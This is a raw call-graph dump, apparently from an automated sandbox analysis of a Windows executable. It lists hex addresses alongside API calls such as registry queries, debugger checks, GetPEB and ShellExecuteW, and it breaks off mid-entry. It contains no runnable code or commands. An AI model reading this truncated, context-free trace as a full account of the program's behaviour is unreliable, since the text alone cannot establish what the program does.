86429->86426 86431 42687b 86430->86431 86432 4115d7 52 API calls 86431->86432 86433 42689e _memmove 86432->86433 86433->86426 86434->86379 86435->86329 86436 40bd20 86437 428194 86436->86437 86438 40bd2d 86436->86438 86440 40bd43 86437->86440 86442 4281bc 86437->86442 86445 4281b2 86437->86445 86439 40bd37 86438->86439 86459 4531b1 85 API calls 5 library calls 86438->86459 86448 40bd50 86439->86448 86458 45e987 86 API calls ctype 86442->86458 86457 40b510 VariantClear 86445->86457 86447 4281ba 86449 426cf1 86448->86449 86450 40bd63 86448->86450 86469 44cde9 52 API calls _memmove 86449->86469 86460 40bd80 86450->86460 86453 40bd73 86453->86440 86454 426cfc 86455 40e0a0 52 API calls 86454->86455 86456 426d02 86455->86456 86457->86447 86458->86438 86459->86439 86461 40bd8e 86460->86461 86462 40bdb7 _memmove 86460->86462 86461->86462 86463 40bded 86461->86463 86464 40bdad 86461->86464 86462->86453 86466 4115d7 52 API calls 86463->86466 86470 402f00 86464->86470 86467 40bdf6 86466->86467 86467->86462 86468 4115d7 52 API calls 86467->86468 86468->86462 86469->86454 86471 402f10 86470->86471 86472 402f0c 86470->86472 86473 4115d7 52 API calls 86471->86473 86474 4268c3 86471->86474 86472->86462 86475 402f51 ctype _memmove 86473->86475 86475->86462 86476 425ba2 86481 40e360 86476->86481 86478 425bb4 86497 41130a 51 API calls __cinit 86478->86497 86480 425bbe 86482 4115d7 52 API calls 86481->86482 86483 40e3ec GetModuleFileNameW 86482->86483 86498 413a0e 86483->86498 86485 40e421 _wcsncat 86501 413a9e 86485->86501 86488 4115d7 52 API calls 86489 40e45e _wcscpy 86488->86489 86504 40bc70 86489->86504 86493 40e4a9 86493->86478 86494 401c90 52 API calls 86495 40e4a1 _wcscat _wcslen _wcsncpy 86494->86495 86495->86493 86495->86494 86496 4115d7 52 API calls 86495->86496 86496->86495 86497->86480 86523 413801 86498->86523 86553 419efd 86501->86553 86505 4115d7 52 API calls 86504->86505 86506 40bc98 86505->86506 86507 4115d7 52 API calls 86506->86507 86508 40bca6 86507->86508 86509 40e4c0 86508->86509 86565 403350 86509->86565 86511 40e4cb RegOpenKeyExW 86512 427190 RegQueryValueExW 86511->86512 86513 40e4eb 86511->86513 86514 4271b0 86512->86514 86515 42721a RegCloseKey 86512->86515 86513->86495 86516 4115d7 52 API calls 86514->86516 86515->86495 86517 4271cb 86516->86517 86572 43652f 52 API calls 86517->86572 86519 4271d8 RegQueryValueExW 86520 42720e 86519->86520 86521 4271f7 86519->86521 86520->86515 86522 402160 52 API calls 86521->86522 86522->86520 86524 41381a 86523->86524 86525 41389e 86523->86525 86524->86525 86537 41388a 86524->86537 86545 419e30 46 API calls wcstoxq 86524->86545 86526 4139e8 86525->86526 86528 413a00 86525->86528 86550 417f77 46 API calls __getptd_noexit 86526->86550 86552 417f77 46 API calls __getptd_noexit 86528->86552 86529 4139ed 86551 417f25 10 API calls wcstoxq 86529->86551 86533 41396c 86533->86525 86535 413967 86533->86535 86538 41397a 86533->86538 86534 413929 86534->86525 86536 413945 86534->86536 86547 419e30 46 API calls wcstoxq 86534->86547 86535->86485 86536->86525 86536->86535 86541 41395b 86536->86541 86537->86525 86544 413909 86537->86544 86546 419e30 46 API calls wcstoxq 86537->86546 86549 419e30 46 API calls wcstoxq 86538->86549 86548 419e30 46 API calls wcstoxq 86541->86548 86544->86533 86544->86534 86545->86537 86546->86544 86547->86536 86548->86535 86549->86535 86550->86529 86551->86535 86552->86535 86554 419f13 86553->86554 86555 419f0e 86553->86555 86562 417f77 46 API calls __getptd_noexit 86554->86562 86555->86554 86558 419f2b 86555->86558 86557 419f18 86563 417f25 10 API calls wcstoxq 86557->86563 86561 40e454 86558->86561 86564 417f77 46 API calls __getptd_noexit 86558->86564 86561->86488 86562->86557 86563->86561 86564->86557 86566 403367 86565->86566 86567 403358 86565->86567 86568 4115d7 52 API calls 86566->86568 86567->86511 86569 403370 86568->86569 86570 4115d7 52 API calls 86569->86570 86571 40339e 86570->86571 86571->86511 86572->86519 86573 4738190 86588 4735de0 86573->86588 86575 4738264 86591 4738080 86575->86591 86590 473646b 86588->86590 86594 4739290 GetPEB 86588->86594 86590->86575 86592 4738089 Sleep 86591->86592 86593 4738097 86592->86593 86594->86590 86595 416454 86632 416c70 86595->86632 86597 416460 GetStartupInfoW 86598 416474 86597->86598 86633 419d5a HeapCreate 86598->86633 86600 4164cd 86601 4164d8 86600->86601 86716 41642b 46 API calls 3 library calls 86600->86716 86634 417c20 GetModuleHandleW 86601->86634 86604 4164de 86605 4164e9 __RTC_Initialize 86604->86605 86717 41642b 46 API calls 3 library calls 86604->86717 86653 41aaa1 GetStartupInfoW 86605->86653 86609 416503 GetCommandLineW 86666 41f584 GetEnvironmentStringsW 86609->86666 86613 416513 86672 41f4d6 GetModuleFileNameW 86613->86672 86615 41651d 86616 416528 86615->86616 86719 411924 46 API calls 3 library calls 86615->86719 86676 41f2a4 86616->86676 86619 41652e 86620 416539 86619->86620 86720 411924 46 API calls 3 library calls 86619->86720 86690 411703 86620->86690 86623 416541 86625 41654c __wwincmdln 86623->86625 86721 411924 46 API calls 3 library calls 86623->86721 86694 40d6b0 86625->86694 86628 41657c 86723 411906 46 API calls _doexit 86628->86723 86631 416581 __read 86632->86597 86633->86600 86635 417c34 86634->86635 86636 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86634->86636 86724 4178ff 49 API calls _free 86635->86724 86637 417c87 TlsAlloc 86636->86637 86641 417cd5 TlsSetValue 86637->86641 86642 417d96 86637->86642 86640 417c39 86640->86604 86641->86642 86643 417ce6 __init_pointers 86641->86643 86642->86604 86725 418151 InitializeCriticalSectionAndSpinCount 86643->86725 86645 417d91 86733 4178ff 49 API calls _free 86645->86733 86647 417d2a 86647->86645 86726 416b49 86647->86726 86650 417d76 86732 41793c 46 API calls 4 library calls 86650->86732 86652 417d7e GetCurrentThreadId 86652->86642 86654 416b49 __calloc_crt 46 API calls 86653->86654 86655 41aabf 86654->86655 86655->86655 86656 41ac34 86655->86656 86658 416b49 __calloc_crt 46 API calls 86655->86658 86660 4164f7 86655->86660 86662 41abb4 86655->86662 86657 41ac6a GetStdHandle 86656->86657 86659 41acce SetHandleCount 86656->86659 86661 41ac7c GetFileType 86656->86661 86665 41aca2 InitializeCriticalSectionAndSpinCount 86656->86665 86657->86656 86658->86655 86659->86660 86660->86609 86718 411924 46 API calls 3 library calls 86660->86718 86661->86656 86662->86656 86663 41abe0 GetFileType 86662->86663 86664 41abeb InitializeCriticalSectionAndSpinCount 86662->86664 86663->86662 86663->86664 86664->86660 86664->86662 86665->86656 86665->86660 86667 41f595 86666->86667 86668 41f599 86666->86668 86667->86613 86743 416b04 86668->86743 86670 41f5bb _memmove 86671 41f5c2 FreeEnvironmentStringsW 86670->86671 86671->86613 86673 41f50b _wparse_cmdline 86672->86673 86674 416b04 __malloc_crt 46 API calls 86673->86674 86675 41f54e _wparse_cmdline 86673->86675 86674->86675 86675->86615 86677 41f2bc _wcslen 86676->86677 86681 41f2b4 86676->86681 86678 416b49 __calloc_crt 46 API calls 86677->86678 86683 41f2e0 _wcslen 86678->86683 86679 41f336 86750 413748 86679->86750 86681->86619 86682 416b49 __calloc_crt 46 API calls 86682->86683 86683->86679 86683->86681 86683->86682 86684 41f35c 86683->86684 86687 41f373 86683->86687 86749 41ef12 46 API calls wcstoxq 86683->86749 86685 413748 _free 46 API calls 86684->86685 86685->86681 86756 417ed3 86687->86756 86689 41f37f 86689->86619 86691 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86690->86691 86693 411750 __IsNonwritableInCurrentImage 86691->86693 86775 41130a 51 API calls __cinit 86691->86775 86693->86623 86695 42e2f3 86694->86695 86696 40d6cc 86694->86696 86776 408f40 86696->86776 86698 40d707 86780 40ebb0 86698->86780 86701 40d737 86783 411951 86701->86783 86706 40d751 86795 40f4e0 SystemParametersInfoW SystemParametersInfoW 86706->86795 86708 40d75f 86796 40d590 GetCurrentDirectoryW 86708->86796 86710 40d767 SystemParametersInfoW 86711 40d78d 86710->86711 86712 408f40 VariantClear 86711->86712 86713 40d79d 86712->86713 86714 408f40 VariantClear 86713->86714 86715 40d7a6 86714->86715 86715->86628 86722 4118da 46 API calls _doexit 86715->86722 86716->86601 86717->86605 86722->86628 86723->86631 86724->86640 86725->86647 86728 416b52 86726->86728 86729 416b8f 86728->86729 86730 416b70 Sleep 86728->86730 86734 41f677 86728->86734 86729->86645 86729->86650 86731 416b85 86730->86731 86731->86728 86731->86729 86732->86652 86733->86642 86735 41f683 86734->86735 86741 41f69e _malloc 86734->86741 86736 41f68f 86735->86736 86735->86741 86742 417f77 46 API calls __getptd_noexit 86736->86742 86738 41f6b1 HeapAlloc 86740 41f6d8 86738->86740 86738->86741 86739 41f694 86739->86728 86740->86728 86741->86738 86741->86740 86742->86739 86746 416b0d 86743->86746 86744 4135bb _malloc 45 API calls 86744->86746 86745 416b43 86745->86670 86746->86744 86746->86745 86747 416b24 Sleep 86746->86747 86748 416b39 86747->86748 86748->86745 86748->86746 86749->86683 86751 41377c _free 86750->86751 86752 413753 RtlFreeHeap 86750->86752 86751->86681 86752->86751 86753 413768 86752->86753 86759 417f77 46 API calls __getptd_noexit 86753->86759 86755 41376e GetLastError 86755->86751 86760 417daa 86756->86760 86759->86755 86761 417dc9 setSBCS __call_reportfault 86760->86761 86762 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86761->86762 86765 417eb5 __call_reportfault 86762->86765 86764 417ed1 GetCurrentProcess TerminateProcess 86764->86689 86766 41a208 86765->86766 86767 41a210 86766->86767 86768 41a212 IsDebuggerPresent 86766->86768 86767->86764 86774 41fe19 86768->86774 86771 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86772 421ff8 GetCurrentProcess TerminateProcess 86771->86772 86773 421ff0 __call_reportfault 86771->86773 86772->86764 86773->86772 86774->86771 86775->86693 86777 408f48 ctype 86776->86777 86778 4265c7 VariantClear 86777->86778 86779 408f55 ctype 86777->86779 86778->86779 86779->86698 86836 40ebd0 86780->86836 86840 4182cb 86783->86840 86785 41195e 86847 4181f2 LeaveCriticalSection 86785->86847 86787 40d748 86788 4119b0 86787->86788 86789 4119d6 86788->86789 86790 4119bc 86788->86790 86789->86706 86790->86789 86882 417f77 46 API calls __getptd_noexit 86790->86882 86792 4119c6 86883 417f25 10 API calls wcstoxq 86792->86883 86794 4119d1 86794->86706 86795->86708 86884 401f20 86796->86884 86798 40d5b6 IsDebuggerPresent 86799 40d5c4 86798->86799 86800 42e1bb MessageBoxA 86798->86800 86801 42e1d4 86799->86801 86802 40d5e3 86799->86802 86800->86801 87056 403a50 52 API calls 3 library calls 86801->87056 86954 40f520 86802->86954 86806 40d5fd GetFullPathNameW 86966 401460 86806->86966 86808 40d63b 86809 40d643 86808->86809 86811 42e231 SetCurrentDirectoryW 86808->86811 86810 40d64c 86809->86810 87057 432fee 6 API calls 86809->87057 86981 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86810->86981 86811->86809 86814 42e252 86814->86810 86816 42e25a GetModuleFileNameW 86814->86816 86818 42e274 86816->86818 86819 42e2cb GetForegroundWindow ShellExecuteW 86816->86819 87058 401b10 86818->87058 86823 40d688 86819->86823 86820 40d656 86822 40d669 86820->86822 86825 40e0c0 74 API calls 86820->86825 86989 4091e0 86822->86989 86827 40d692 SetCurrentDirectoryW 86823->86827 86825->86822 86827->86710 86830 42e28d 87065 40d200 52 API calls 2 library calls 86830->87065 86833 42e299 GetForegroundWindow ShellExecuteW 86834 42e2c6 86833->86834 86834->86823 86835 40ec00 LoadLibraryA GetProcAddress 86835->86701 86837 40d72e 86836->86837 86838 40ebd6 LoadLibraryA 86836->86838 86837->86701 86837->86835 86838->86837 86839 40ebe7 GetProcAddress 86838->86839 86839->86837 86841 4182e0 86840->86841 86842 4182f3 EnterCriticalSection 86840->86842 86848 418209 86841->86848 86842->86785 86844 4182e6 86844->86842 86875 411924 46 API calls 3 library calls 86844->86875 86847->86787 86849 418215 __read 86848->86849 86850 418225 86849->86850 86851 41823d 86849->86851 86876 418901 46 API calls __NMSG_WRITE 86850->86876 86854 416b04 __malloc_crt 45 API calls 86851->86854 86860 41824b __read 86851->86860 86853 41822a 86877 418752 46 API calls 6 library calls 86853->86877 86856 418256 86854->86856 86858 41825d 86856->86858 86859 41826c 86856->86859 86857 418231 86878 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86857->86878 86879 417f77 46 API calls __getptd_noexit 86858->86879 86863 4182cb __lock 45 API calls 86859->86863 86860->86844 86865 418273 86863->86865 86866 4182a6 86865->86866 86867 41827b InitializeCriticalSectionAndSpinCount 86865->86867 86870 413748 _free 45 API calls 86866->86870 86868 418297 86867->86868 86869 41828b 86867->86869 86881 4182c2 LeaveCriticalSection _doexit 86868->86881 86871 413748 _free 45 API calls 86869->86871 86870->86868 86872 418291 86871->86872 86880 417f77 46 API calls __getptd_noexit 86872->86880 86876->86853 86877->86857 86879->86860 86880->86868 86881->86860 86882->86792 86883->86794 87066 40e6e0 86884->87066 86888 401f41 GetModuleFileNameW 87084 410100 86888->87084 86890 401f5c 87096 410960 86890->87096 86893 401b10 52 API calls 86894 401f81 86893->86894 87099 401980 86894->87099 86896 401f8e 86897 408f40 VariantClear 86896->86897 86898 401f9d 86897->86898 86899 401b10 52 API calls 86898->86899 86900 401fb4 86899->86900 86901 401980 53 API calls 86900->86901 86902 401fc3 86901->86902 86903 401b10 52 API calls 86902->86903 86904 401fd2 86903->86904 87107 40c2c0 86904->87107 86906 401fe1 86907 40bc70 52 API calls 86906->86907 86908 401ff3 86907->86908 87125 401a10 86908->87125 86910 401ffe 87132 4114ab 86910->87132 86913 428b05 86915 401a10 52 API calls 86913->86915 86914 402017 86916 4114ab __wcsicoll 58 API calls 86914->86916 86917 428b18 86915->86917 86918 402022 86916->86918 86920 401a10 52 API calls 86917->86920 86918->86917 86919 40202d 86918->86919 86921 4114ab __wcsicoll 58 API calls 86919->86921 86922 428b33 86920->86922 86923 402038 86921->86923 86925 428b3b GetModuleFileNameW 86922->86925 86924 402043 86923->86924 86923->86925 86926 4114ab __wcsicoll 58 API calls 86924->86926 86927 401a10 52 API calls 86925->86927 86929 40204e 86926->86929 86928 428b6c 86927->86928 86931 40e0a0 52 API calls 86928->86931 86930 402092 86929->86930 86934 401a10 52 API calls 86929->86934 86939 428b90 _wcscpy 86929->86939 86933 4020a3 86930->86933 86930->86939 86932 428b7a 86931->86932 86935 401a10 52 API calls 86932->86935 86936 428bc6 86933->86936 87140 40e830 53 API calls 86933->87140 86937 402073 _wcscpy 86934->86937 86938 428b88 86935->86938 86944 401a10 52 API calls 86937->86944 86938->86939 86941 401a10 52 API calls 86939->86941 86949 4020d0 86941->86949 86942 4020bb 87141 40cf00 53 API calls 86942->87141 86944->86930 86945 4020c6 86946 408f40 VariantClear 86945->86946 86946->86949 86947 402110 86951 408f40 VariantClear 86947->86951 86949->86947 86952 401a10 52 API calls 86949->86952 87142 40cf00 53 API calls 86949->87142 87143 40e6a0 53 API calls 86949->87143 86953 402120 ctype 86951->86953 86952->86949 86953->86798 86955 4295c9 setSBCS 86954->86955 86956 40f53c 86954->86956 86958 4295d9 GetOpenFileNameW 86955->86958 87822 410120 86956->87822 86958->86956 86962 40d5f5 86958->86962 86959 40f545 87826 4102b0 SHGetMalloc 86959->87826 86961 40f54c 87831 410190 GetFullPathNameW 86961->87831 86962->86806 86962->86808 86964 40f559 87842 40f570 86964->87842 87904 402400 86966->87904 86968 40146f 86971 428c29 _wcscat 86968->86971 87913 401500 86968->87913 86970 40147c 86970->86971 87921 40d440 86970->87921 86973 401489 86973->86971 86974 401491 GetFullPathNameW 86973->86974 86975 402160 52 API calls 86974->86975 86976 4014bb 86975->86976 86977 402160 52 API calls 86976->86977 86978 4014c8 86977->86978 86978->86971 86979 402160 52 API calls 86978->86979 86980 4014ee 86979->86980 86980->86808 86982 428361 86981->86982 86983 4103fc LoadImageW RegisterClassExW 86981->86983 87941 44395e EnumResourceNamesW LoadImageW 86982->87941 87940 410490 7 API calls 86983->87940 86986 40d651 86988 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86986->86988 86987 428368 86988->86820 86990 409202 86989->86990 86991 42d7ad 86989->86991 87049 409216 ctype 86990->87049 88213 410940 329 API calls 86990->88213 88216 45e737 90 API calls 3 library calls 86991->88216 86994 409386 86995 40939c 86994->86995 88214 40f190 10 API calls 86994->88214 86995->86823 87055 401000 Shell_NotifyIconW setSBCS 86995->87055 86997 4095b2 86997->86995 86999 4095bf 86997->86999 86998 409253 PeekMessageW 86998->87049 88215 401a50 329 API calls 86999->88215 87001 42d8cd Sleep 87001->87049 87002 4095c6 LockWindowUpdate DestroyWindow GetMessageW 87002->86995 87005 4095f9 87002->87005 87004 42e13b 88234 40d410 VariantClear 87004->88234 87008 42e158 TranslateMessage DispatchMessageW GetMessageW 87005->87008 87008->87008 87009 42e188 87008->87009 87009->86995 87011 409567 PeekMessageW 87011->87049 87013 44c29d 52 API calls 87054 4094e0 87013->87054 87014 46f3c1 107 API calls 87014->87049 87015 40e0a0 52 API calls 87015->87049 87016 46fdbf 108 API calls 87016->87054 87017 42dcd2 WaitForSingleObject 87021 42dcf0 GetExitCodeProcess CloseHandle 87017->87021 87017->87049 87018 409551 TranslateMessage DispatchMessageW 87018->87011 87020 42dd3d Sleep 87020->87054 88223 40d410 VariantClear 87021->88223 87024 4094cf Sleep 87024->87054 87025 40c620 timeGetTime 87025->87054 87027 40d410 VariantClear 87027->87049 87029 42d94d timeGetTime 88219 465124 53 API calls 87029->88219 87033 42dd89 CloseHandle 87033->87054 87034 47d33e 307 API calls 87034->87049 87035 408f40 VariantClear 87035->87054 87037 465124 53 API calls 87037->87054 87038 42de19 GetExitCodeProcess CloseHandle 87038->87054 87040 401b10 52 API calls 87040->87054 87042 42de88 Sleep 87042->87049 87045 401980 53 API calls 87045->87054 87046 45e737 90 API calls 87046->87049 87049->86994 87049->86998 87049->87001 87049->87004 87049->87011 87049->87014 87049->87015 87049->87017 87049->87018 87049->87020 87049->87024 87049->87027 87049->87029 87049->87034 87049->87046 87050 42e0cc VariantClear 87049->87050 87051 408f40 VariantClear 87049->87051 87049->87054 87942 4091b0 87049->87942 88000 40afa0 87049->88000 88026 408fc0 87049->88026 88061 408cc0 87049->88061 88075 40d150 87049->88075 88080 40d170 87049->88080 88086 4096a0 87049->88086 88217 465124 53 API calls 87049->88217 88218 40c620 timeGetTime 87049->88218 88233 40e270 VariantClear ctype 87049->88233 87050->87049 87051->87049 87054->87013 87054->87016 87054->87025 87054->87033 87054->87035 87054->87037 87054->87038 87054->87040 87054->87042 87054->87045 87054->87049 88220 45178a 54 API calls 87054->88220 88221 47d33e 329 API calls 87054->88221 88222 453bc6 54 API calls 87054->88222 88224 40d410 VariantClear 87054->88224 88225 443d19 67 API calls _wcslen 87054->88225 88226 4574b4 VariantClear 87054->88226 88227 403cd0 87054->88227 88231 4731e1 VariantClear 87054->88231 88232 4331a2 6 API calls 87054->88232 87055->86823 87056->86808 87057->86814 87059 401b16 _wcslen 87058->87059 87060 4115d7 52 API calls 87059->87060 87063 401b63 87059->87063 87061 401b4b _memmove 87060->87061 87062 4115d7 52 API calls 87061->87062 87062->87063 87064 40d200 52 API calls 2 library calls 87063->87064 87064->86830 87065->86833 87067 40bc70 52 API calls 87066->87067 87068 401f31 87067->87068 87069 402560 87068->87069 87070 40256d __write_nolock 87069->87070 87071 402160 52 API calls 87070->87071 87073 402593 87071->87073 87083 4025bd 87073->87083 87144 401c90 87073->87144 87074 4026f0 52 API calls 87074->87083 87075 4026a7 87076 401b10 52 API calls 87075->87076 87082 4026db 87075->87082 87078 4026d1 87076->87078 87077 401b10 52 API calls 87077->87083 87148 40d7c0 52 API calls 2 library calls 87078->87148 87079 401c90 52 API calls 87079->87083 87082->86888 87083->87074 87083->87075 87083->87077 87083->87079 87147 40d7c0 52 API calls 2 library calls 87083->87147 87149 40f760 87084->87149 87087 410118 87087->86890 87089 42805d 87090 42806a 87089->87090 87205 431e58 87089->87205 87092 413748 _free 46 API calls 87090->87092 87093 428078 87092->87093 87094 431e58 82 API calls 87093->87094 87095 428084 87094->87095 87095->86890 87097 4115d7 52 API calls 87096->87097 87098 401f74 87097->87098 87098->86893 87100 4019a3 87099->87100 87104 401985 87099->87104 87101 4019b8 87100->87101 87100->87104 87811 403e10 53 API calls 87101->87811 87102 40199f 87102->86896 87104->87102 87810 403e10 53 API calls 87104->87810 87106 4019c4 87106->86896 87108 40c2c7 87107->87108 87109 40c30e 87107->87109 87110 40c2d3 87108->87110 87111 426c79 87108->87111 87112 40c315 87109->87112 87113 426c2b 87109->87113 87812 403ea0 52 API calls __cinit 87110->87812 87817 4534e3 52 API calls 87111->87817 87117 40c321 87112->87117 87118 426c5a 87112->87118 87115 426c4b 87113->87115 87116 426c2e 87113->87116 87815 4534e3 52 API calls 87115->87815 87124 40c2de 87116->87124 87814 4534e3 52 API calls 87116->87814 87813 403ea0 52 API calls __cinit 87117->87813 87816 4534e3 52 API calls 87118->87816 87124->86906 87126 401a30 87125->87126 87127 401a17 87125->87127 87129 402160 52 API calls 87126->87129 87128 401a2d 87127->87128 87818 403c30 52 API calls _memmove 87127->87818 87128->86910 87131 401a3d 87129->87131 87131->86910 87133 411523 87132->87133 87134 4114ba 87132->87134 87821 4113a8 58 API calls 3 library calls 87133->87821 87139 40200c 87134->87139 87819 417f77 46 API calls __getptd_noexit 87134->87819 87137 4114c6 87820 417f25 10 API calls wcstoxq 87137->87820 87139->86913 87139->86914 87140->86942 87141->86945 87142->86949 87143->86949 87145 4026f0 52 API calls 87144->87145 87146 401c97 87145->87146 87146->87073 87147->87083 87148->87082 87209 40f6f0 87149->87209 87151 40f77b _strcat ctype 87217 40f850 87151->87217 87156 427c2a 87246 414d04 87156->87246 87158 40f7fc 87158->87156 87159 40f804 87158->87159 87233 414a46 87159->87233 87163 40f80e 87163->87087 87168 4528bd 87163->87168 87165 427c59 87252 414fe2 87165->87252 87167 427c79 87169 4150d1 _fseek 81 API calls 87168->87169 87170 452930 87169->87170 87752 452719 87170->87752 87173 452948 87173->87089 87174 414d04 __fread_nolock 61 API calls 87175 452966 87174->87175 87176 414d04 __fread_nolock 61 API calls 87175->87176 87177 452976 87176->87177 87178 414d04 __fread_nolock 61 API calls 87177->87178 87179 45298f 87178->87179 87180 414d04 __fread_nolock 61 API calls 87179->87180 87181 4529aa 87180->87181 87182 4150d1 _fseek 81 API calls 87181->87182 87183 4529c4 87182->87183 87184 4135bb _malloc 46 API calls 87183->87184 87185 4529cf 87184->87185 87186 4135bb _malloc 46 API calls 87185->87186 87187 4529db 87186->87187 87188 414d04 __fread_nolock 61 API calls 87187->87188 87189 4529ec 87188->87189 87190 44afef GetSystemTimeAsFileTime 87189->87190 87191 452a00 87190->87191 87192 452a36 87191->87192 87193 452a13 87191->87193 87195 452aa5 87192->87195 87196 452a3c 87192->87196 87194 413748 _free 46 API calls 87193->87194 87198 452a1c 87194->87198 87197 413748 _free 46 API calls 87195->87197 87758 44b1a9 87196->87758 87202 452aa3 87197->87202 87200 413748 _free 46 API calls 87198->87200 87203 452a25 87200->87203 87201 452a9d 87204 413748 _free 46 API calls 87201->87204 87202->87089 87203->87089 87204->87202 87206 431e64 87205->87206 87207 431e6a 87205->87207 87208 414a46 __fcloseall 82 API calls 87206->87208 87207->87090 87208->87207 87210 425de2 87209->87210 87214 40f6fc _wcslen 87209->87214 87210->87151 87211 40f710 WideCharToMultiByte 87212 40f756 87211->87212 87213 40f728 87211->87213 87212->87151 87215 4115d7 52 API calls 87213->87215 87214->87211 87216 40f735 WideCharToMultiByte 87215->87216 87216->87151 87218 40f85d setSBCS _strlen 87217->87218 87220 40f7ab 87218->87220 87265 414db8 87218->87265 87221 4149c2 87220->87221 87280 414904 87221->87280 87223 40f7e9 87223->87156 87224 40f5c0 87223->87224 87228 40f5cd _strcat __write_nolock _memmove 87224->87228 87225 414d04 __fread_nolock 61 API calls 87225->87228 87227 425d11 87229 4150d1 _fseek 81 API calls 87227->87229 87228->87225 87228->87227 87232 40f691 __tzset_nolock 87228->87232 87368 4150d1 87228->87368 87230 425d33 87229->87230 87231 414d04 __fread_nolock 61 API calls 87230->87231 87231->87232 87232->87158 87234 414a52 __read 87233->87234 87235 414a64 87234->87235 87236 414a79 87234->87236 87508 417f77 46 API calls __getptd_noexit 87235->87508 87239 415471 __lock_file 47 API calls 87236->87239 87244 414a74 __read 87236->87244 87238 414a69 87509 417f25 10 API calls wcstoxq 87238->87509 87241 414a92 87239->87241 87492 4149d9 87241->87492 87244->87163 87577 414c76 87246->87577 87248 414d1c 87249 44afef 87248->87249 87745 442c5a 87249->87745 87251 44b00d 87251->87165 87253 414fee __read 87252->87253 87254 414ffa 87253->87254 87255 41500f 87253->87255 87749 417f77 46 API calls __getptd_noexit 87254->87749 87257 415471 __lock_file 47 API calls 87255->87257 87259 415017 87257->87259 87258 414fff 87750 417f25 10 API calls wcstoxq 87258->87750 87261 414e4e __ftell_nolock 51 API calls 87259->87261 87262 415024 87261->87262 87751 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87262->87751 87263 41500a __read 87263->87167 87266 414dd6 87265->87266 87267 414deb 87265->87267 87276 417f77 46 API calls __getptd_noexit 87266->87276 87267->87266 87269 414df2 87267->87269 87278 41b91b 79 API calls 12 library calls 87269->87278 87270 414ddb 87277 417f25 10 API calls wcstoxq 87270->87277 87273 414e18 87274 414de6 87273->87274 87279 418f98 77 API calls 7 library calls 87273->87279 87274->87218 87276->87270 87277->87274 87278->87273 87279->87274 87282 414910 __read 87280->87282 87281 414923 87336 417f77 46 API calls __getptd_noexit 87281->87336 87282->87281 87284 414951 87282->87284 87299 41d4d1 87284->87299 87285 414928 87337 417f25 10 API calls wcstoxq 87285->87337 87288 414956 87289 41496a 87288->87289 87290 41495d 87288->87290 87292 414992 87289->87292 87293 414972 87289->87293 87338 417f77 46 API calls __getptd_noexit 87290->87338 87316 41d218 87292->87316 87339 417f77 46 API calls __getptd_noexit 87293->87339 87294 414933 @_EH4_CallFilterFunc@8 __read 87294->87223 87300 41d4dd __read 87299->87300 87301 4182cb __lock 46 API calls 87300->87301 87314 41d4eb 87301->87314 87302 41d560 87341 41d5fb 87302->87341 87303 41d567 87305 416b04 __malloc_crt 46 API calls 87303->87305 87307 41d56e 87305->87307 87306 41d5f0 __read 87306->87288 87307->87302 87308 41d57c InitializeCriticalSectionAndSpinCount 87307->87308 87309 41d59c 87308->87309 87310 41d5af EnterCriticalSection 87308->87310 87313 413748 _free 46 API calls 87309->87313 87310->87302 87311 418209 __mtinitlocknum 46 API calls 87311->87314 87313->87302 87314->87302 87314->87303 87314->87311 87344 4154b2 47 API calls __lock 87314->87344 87345 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87314->87345 87317 41d23a 87316->87317 87318 41d255 87317->87318 87330 41d26c __wopenfile 87317->87330 87350 417f77 46 API calls __getptd_noexit 87318->87350 87320 41d421 87323 41d47a 87320->87323 87324 41d48c 87320->87324 87321 41d25a 87351 417f25 10 API calls wcstoxq 87321->87351 87355 417f77 46 API calls __getptd_noexit 87323->87355 87347 422bf9 87324->87347 87327 41499d 87340 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87327->87340 87328 41d47f 87356 417f25 10 API calls wcstoxq 87328->87356 87330->87320 87330->87323 87352 41341f 58 API calls 2 library calls 87330->87352 87332 41d41a 87332->87320 87353 41341f 58 API calls 2 library calls 87332->87353 87334 41d439 87334->87320 87354 41341f 58 API calls 2 library calls 87334->87354 87336->87285 87337->87294 87338->87294 87339->87294 87340->87294 87346 4181f2 LeaveCriticalSection 87341->87346 87343 41d602 87343->87306 87344->87314 87345->87314 87346->87343 87357 422b35 87347->87357 87349 422c14 87349->87327 87350->87321 87351->87327 87352->87332 87353->87334 87354->87320 87355->87328 87356->87327 87358 422b41 __read 87357->87358 87359 422b54 87358->87359 87361 422b8a 87358->87361 87360 417f77 wcstoxq 46 API calls 87359->87360 87362 422b59 87360->87362 87364 422400 __tsopen_nolock 109 API calls 87361->87364 87363 417f25 wcstoxq 10 API calls 87362->87363 87367 422b63 __read 87363->87367 87365 422ba4 87364->87365 87366 422bcb __wsopen_helper LeaveCriticalSection 87365->87366 87366->87367 87367->87349 87370 4150dd __read 87368->87370 87369 4150e9 87399 417f77 46 API calls __getptd_noexit 87369->87399 87370->87369 87371 41510f 87370->87371 87381 415471 87371->87381 87374 4150ee 87400 417f25 10 API calls wcstoxq 87374->87400 87380 4150f9 __read 87380->87228 87382 415483 87381->87382 87383 4154a5 EnterCriticalSection 87381->87383 87382->87383 87384 41548b 87382->87384 87385 415117 87383->87385 87386 4182cb __lock 46 API calls 87384->87386 87387 415047 87385->87387 87386->87385 87388 415067 87387->87388 87389 415057 87387->87389 87394 415079 87388->87394 87402 414e4e 87388->87402 87457 417f77 46 API calls __getptd_noexit 87389->87457 87393 41505c 87401 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87393->87401 87419 41443c 87394->87419 87397 4150b9 87432 41e1f4 87397->87432 87399->87374 87400->87380 87401->87380 87403 414e61 87402->87403 87404 414e79 87402->87404 87458 417f77 46 API calls __getptd_noexit 87403->87458 87405 414139 __fflush_nolock 46 API calls 87404->87405 87407 414e80 87405->87407 87410 41e1f4 __write 51 API calls 87407->87410 87408 414e66 87459 417f25 10 API calls wcstoxq 87408->87459 87411 414e97 87410->87411 87412 414f09 87411->87412 87414 414ec9 87411->87414 87418 414e71 87411->87418 87460 417f77 46 API calls __getptd_noexit 87412->87460 87415 